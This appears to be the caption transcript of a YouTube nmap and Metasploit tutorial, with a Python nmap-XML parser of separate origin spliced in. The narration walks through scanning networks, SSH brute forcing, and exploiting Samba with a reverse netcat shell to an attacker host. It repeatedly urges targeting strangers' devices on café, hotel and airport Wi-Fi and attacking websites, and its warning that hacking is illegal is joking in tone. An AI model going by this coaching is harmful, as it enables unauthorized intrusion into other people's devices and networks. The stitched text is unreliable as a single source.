NMAP Tutorial for Beginners! Network Attacks

Captions
Today you'll be learning how you can use nmap, a network mapping tool that will allow you to scan devices within your own home Wi-Fi network, or possibly, let's say you go to a free Wi-Fi network like Starbucks, hotel Wi-Fi, the airport's Wi-Fi and so on, and from there you'll be able to detect all these different devices within the network and look for possible entry points to give you access into those devices. I kid you not. At the same time, if you have Mr Hacker as your neighbor, then what happens is that he may somehow have gotten your Wi-Fi password and he is within your network; you'll be able to identify just that. Pretty cool, huh? Let's go ahead and get started.

So right in front of us we have Kali Linux running, and over here what you can see is that we can go ahead and open up a terminal, and I can zoom in a little more so it's easier for you to see. All you got to do is enter nmap, and from nmap you can see all the different options that we can use in order to run a scan against the network or against the target devices or websites. And you'll be saying, what if I'm on a Windows computer? In that case, what you can do is go into the Microsoft Store, enter Kali Linux in the search field and click install. Once you have installed Kali Linux on your Windows computer, you will be able to use nmap to likewise scan all these different devices within the network or over the internet, using Kali Linux with nmap installed and available within your Windows computer.

So right in the middle you would have your own home router, or possibly you're connecting through Starbucks free Wi-Fi and so on, and then of course on the right side you would have your own computer. Your own computer could be a laptop; it could also be your mobile device where you have nmap installed. Once you have that, as long as you are connected to the network, you'll be able to scan the network looking for other devices within the network that you can then check for, say, does this have Remote Desktop Protocol open? Does it have, say, SSH open? Does it have, say, a web server that is open? So once you're able to discover all these different services, you'll be able to use subsequent tools or even scripts from nmap to launch attacks against all these different connected devices. And yes, I know the Wi-Fi router that I'm drawing here looks like a TV. Not only that, let's say from your own personal computer you'll be able to launch attacks against all these different sites across the internet. Say for example you go to L ley.com and then you launch an attack against the site, looking for possibly different types of ports to be open, say port 80, port 443, port 445 and so on and so forth, and see which one of them is open that you can possibly target with subsequent tools like, say, Metasploit, like, say, brute forcing attack tools and nmap scripts and so on. And don't bother attacking Mr Hackerloi's website, because I will find out your IP address. And remember, kids, before we go any further: hacking is illegal. When you scan a website using nmap, when you scan another device using nmap, many of these intrusion detection systems or firewalls will be able to pick up, hey, there is this IP address that's running all these scans in our network, let's go and find out who this person is. And if you get found out, that's it, it's game over for you. And the most important thing of all is, don't tell them that Mr Hackerloi taught you all this.

All right, so use case number one: let's discover all network devices within, say, the Wi-Fi router that you are connected to. The first thing you can do is enter ip addr, and from here you'll be able to uncover your IP address. So over here you have 192.168.0.117/24. All right, so with that we'll be able to go ahead and launch a scan against the network. You can see over here we have nmap followed by -sn; this means no port scan, so this helps us speed up the scan against the entire network. Then, followed by 192.168.0.0/24, so we are scanning all of the IP addresses within 192.168.0, and then 1 all the way to 255. So once you're ready for the scan, go ahead in 3, 2, 1, hit enter, and right now we're scanning against all these different IP addresses, and right here we can see which of these devices are up and running. You can see over here we have the list, and from the list you can see we have .1 is host up, .110 and so on and so forth. So this helps us identify all those IP addresses that we can potentially target later on.

From the list over here, what we can do is go ahead and target a specific IP address. So in this case let's say we target 192.168.0.184. You can see over here we have the instruction of nmap against the IP address. Of course, in the real world you can also be targeting a specific domain name, say ly.com. So when you go ahead and hit enter on that, we're using the default settings that come along with the default scan, and immediately from the default scan we'll be able to see all these different services as well as their associated ports that are open, the protocol of TCP and so on and so forth. So this helps us understand what potential services are open. It's like a house: how many windows are open, how many doors are open that we can possibly have as an entry point into the device. However, that is typically not sufficient for us to launch an attack against the service, so what we need here is typically -sV. This stands for service version; what it does is help us identify specifically the version of that service, so that we'll be able to look up and see if there are any common vulnerabilities and exposures or exploits available for us to target against that service. Once you're ready, go ahead and 3, 2, 1, hit enter on that. This will take a little longer because right now we're going deeper, we're probing deeper, we're enumerating deeper, so it takes a longer time for us to get those results. So hang on tight, get a cup of coffee and come back in a second. Boom, done. We now got the service version, so you can see right here we got a lot more details than the one earlier. Over here in this case you can see OpenSSH 5.3p1, Apache, all right, 2.2.14, Cory IMM and so on and so forth, all right, the list goes on. So these are all the specific versions of the services that are running on that computer.

So say for example we can use searchsploit to search up, say, OpenSSH 5.3p1, which is the service version we uncovered earlier for port 22. When I hit enter on this, we can look up all of these potential exploits that we can use as part of launching the attack against that specific service. At the same time we can also launch Metasploit, so that from Metasploit we can directly use a much more interactive option to gain direct access to run the exploit. So in this case we're starting up the Metasploit framework over here, and what I can do is once more do a search on OpenSSH. So I do search openssh, all right, and we can see over here we have several modules that are available for us to use. In this case we have, say, an exploit, Windows local, auxiliary scanner SSH enumerate users and so on and so forth. So all these are also the other options that we can use against a specific service version. We also have the option of using nmap scripts to help us run, say, a brute force attack against the login of port 22, which is Secure Shell. So in this case, as you can see over here, we have the following: --script ssh-brute, all right, followed by the script arguments. In this case we have the user database, and the user database is pointing to this common usernames .txt, followed by the pass DB, all right, in this case we also have the common password.txt, and of course the script argument of SSH brute force timeout, and finally the target IP address. Once you're ready, in 3, 2, 1, hit enter on that, and you can see right here we're trying the username/password pairs to see which one gets us a hit. All right, I got some seriously bad news: we are not able to gain access to the Secure Shell service through a brute force attack, so we have to use other methods.

Now, before we go over to using other exploits, there is something really cool here that generates a report for us. What you can see over here is we have nmap as the network mapping tool, -T5 for aggressive, and -A is to use some of the default scripts, OS detection and all these different options that are available for us, -v for verbose, and a target network. So in this case we are once again scanning across all the IP addresses and outputting into a network map XML file, which we will then later convert so that we get a view, or a graphical view, of what's going on across the network. Once you're ready, in 3, 2, 1, hit enter on that. Well, this does take a while; we are scanning several hosts, we're scanning the ports, we're scanning using all these default options, so it takes a while. So in the meantime go ahead and grab yourself, all right, 10 cups of coffee while we wait for the results.

All right, so the scan has completed, and we scanned across all these IP addresses, and you can see over here we have the results for each of the IP addresses including all of this different version information. So what we can do now is look at the file. If you see over here on the previous command, we have the output file networkmap.xml. So if I go ahead and open up, say, Firefox networkmap.xml and hit enter on that, it shows us the information over here, but it's pretty hard to read; it's not really human readable. So what we need to do then is, is there a way for us to convert it into a very beautiful format so that we can see exactly what's going on in a report format? So right here we're using xsltproc ./networkmap.xml followed by --output networkmap.html, so we're converting this to an HTML file. So all I'm going to do right now is, again using Firefox, I'm targeting networkmap.html, hit enter on that, and boom, you can see right here we have a really beautiful result format. So you can see all the IP addresses, and of course I zoom in a little more so it's easier for you to see. As I scroll down further, all right, we can see, okay, for this specific IP address what are the open ports, okay, and we can see the results over here, right. And I scroll down further, okay, we can see possibly other live hosts; of course we can always easily click to expand on them. All right, so these are the things that we can do right here. So we got another one, IP address 192.168.0.101; I can scroll down further and you can see some other interesting information over here as well. So we got the IP address of 192.168.0.110, right, port 80008 89, all right, 8443 and so on and so forth. So all these are the different IP addresses that we have within the network, and you can easily do a scan like this in a cafe, in the airport lounge, at the hotel, and you'll be able to uncover all these different IP addresses that you can easily target later on, say, for exploit.

And if you recall earlier, we had our own computer over here and we were running all these different scans against other possible devices across the network and so on and so forth, and what happened then was that we had a list of all the services and the service versions that are running. However, we had to do a manual check: we had to go over into searchsploit, we had to go over into Metasploit, and then from there we had to list all these different types of service versions and see whether there are exploits available for them. But what if within nmap alone we are able to get those results directly? That would save us a lot of time and a lot of trouble having to use multiple different tools. Why not just use one script scan against the target device and be able to list out all those common vulnerabilities and exposures, possible exploits for it? That would save us a lot of time and effort, and I'll be teaching you just that. So all we got to do right now is ensure that we indicate --script vuln. All right, so in this case we're targeting a single port; this is the single port we're targeting, and seeing whether there are any possible vulnerabilities that we can go after. So you can see right here we have completed the scan and we have found certain vulnerabilities. So we have the following: Apache byterange filter DoS, denial of service attack, all right, so this is CVE number 2011-3192, all right, it's vulnerable to a denial of service attack when numerous overlapping byte ranges are requested. All right, we can also see that HTTP TRACE is enabled, all right, internal IP leaked, all right, we have the HTTP cookie flags, cross-domain policy, all right, cross-domain and client access policies vulnerable, and we also have the cross-site request forgery, or spidering limited to max depth and so on and so forth. So we have all this different information as well, right, so we are uncovering all these vulnerabilities within the port and service. All right, so in this case we also could look at enumeration, so we see there is a /wordpress, /test, /monono, phpmyadmin, so all these are the additional pages we have found within the site that we can go after. All right, so you can see over here, potentially interesting folder with directory listing, so it shows us the list of directories that is available. All right, so we can see all this information directly from here.

And right here we can also use nmap to target specific services. So in this case we're targeting ports 139 and 445 using scripts of SMB OS discovery, enumeration of the shares and enumeration of users against another IP address. So again we can use this for a set of IP addresses or a specific device. So once you're ready, in 3, 2, 1, hit enter on that, and we can see right here we're able to figure out all the different directories that we have access into. All right, so this is a way for us to very quickly uncover all the different accessible directories of a remote device. And this time around you can see right here we're targeting two ports, so in this case ports 139 and 445 of a specific IP address, and getting the service version of it. So we are trying to look specifically for certain vulnerabilities in a target device, and we got a result. With the result right here we can go ahead and, say, look for this potential exploit in, say, Metasploit that can allow us to go ahead and possibly gain direct access into the computer.

So you can see right here I am in Metasploit, and all I got to do is enter search followed by smb. All right, so we can see lots of results; I can just search for samba, and over here we can use a specific exploit. Again, you do have to test out several of these exploits and see which one of them would work, so you have to read a little more, understand a little more and see what's going on. So in this case we will use exploit/multi/samba/usermap_script, so let's go ahead and enter use 8 and hit enter on that. All right, so we have here the default payload, which is cmd/unix/reverse_netcat. Enter show options. So right now all we got to do is quite simply enter set rhosts 192.168.0.212, so this is the target IP address, hit enter on that, and right here you can see under the payload options we have already set the payload, which is LHOST, which is your Kali Linux or the attacker machine, in this case 192.168.0.117, and LPORT, the listening port, of course in this case 4444. All right, so once you're ready, all you got to do right now is go ahead and enter exploit, hit enter on that, and we'll see if we get a result. Started reverse TCP handler, command shell session one opened. So we are in. I can enter pwd (print working directory), I can enter whoami, we are in, it's game over. Enter ls, we can see all this different information right here, which means that we have now remote control of the device.
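The video converts the nmap XML report to HTML with xsltproc so it can be read. As an added example that is not from the video, here is a small Python parser for the same Nmap XML (-oX) format that builds the defender's view of it: which hosts are up and which open services (with product and version) they expose. The XML below is a constructed sample, not a real scan, and REVIEW_PORTS is an assumed list of services worth reviewing on a shared network.

```python
"""Parse Nmap -oX output into an inventory of open services (added example)."""
import xml.etree.ElementTree as ET

# Remote-access / file-sharing ports a defender reviews when they show up on a shared network.
REVIEW_PORTS = {22: "ssh", 445: "smb", 3389: "rdp"}

# Constructed sample of Nmap XML output (not a real scan); versions mirror the tutorial.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX networkmap.xml 192.168.0.0/24">
  <host><status state="up" reason="arp-response"/><address addr="192.168.0.184" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="5.3p1" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.14" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/>
        <service name="microsoft-ds" method="table" conf="3"/></port>
    </ports></host>
  <host><status state="down" reason="no-response"/><address addr="192.168.0.101" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Return {addr: [(port, proto, name, product, version), ...]} for hosts that are up."""
    hosts = {}
    for h in ET.fromstring(xml_text).findall("host"):
        status, addr = h.find("status"), h.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue  # down hosts (or ones without an IPv4 address) carry nothing to review
        services = []
        for p in h.findall("ports/port"):
            st = p.find("state")
            if st is None or st.get("state") != "open":
                continue  # closed/filtered ports are noise for an exposure review
            svc = p.find("service")
            attr = lambda key: svc.get(key, "") if svc is not None else ""  # unprobed -> ""
            services.append((int(p.get("portid")), p.get("protocol"),
                             attr("name"), attr("product"), attr("version")))
        hosts[addr.get("addr")] = sorted(services)
    return hosts


def exposure_report(hosts):
    """One line per open port; remote-access/file-sharing services get a [REVIEW] tag."""
    lines = []
    for addr, services in sorted(hosts.items()):
        for port, proto, name, product, version in services:
            tag = f"  [REVIEW {REVIEW_PORTS[port]}]" if port in REVIEW_PORTS else ""
            lines.append(f"{addr}:{port}/{proto} {name} {product} {version}".rstrip() + tag)
    return lines
```

Run `exposure_report(parse_nmap_xml(open("networkmap.xml").read()))` on a real `-oX` file to get the same inventory for your own network; the down host and the filtered port 445 in the sample are deliberately dropped.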
Info
Channel: Loi Liang Yang
Views: 74,103
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: LTMucsu35dk
Length: 15min 50sec (950 seconds)
Published: Thu Nov 23 2023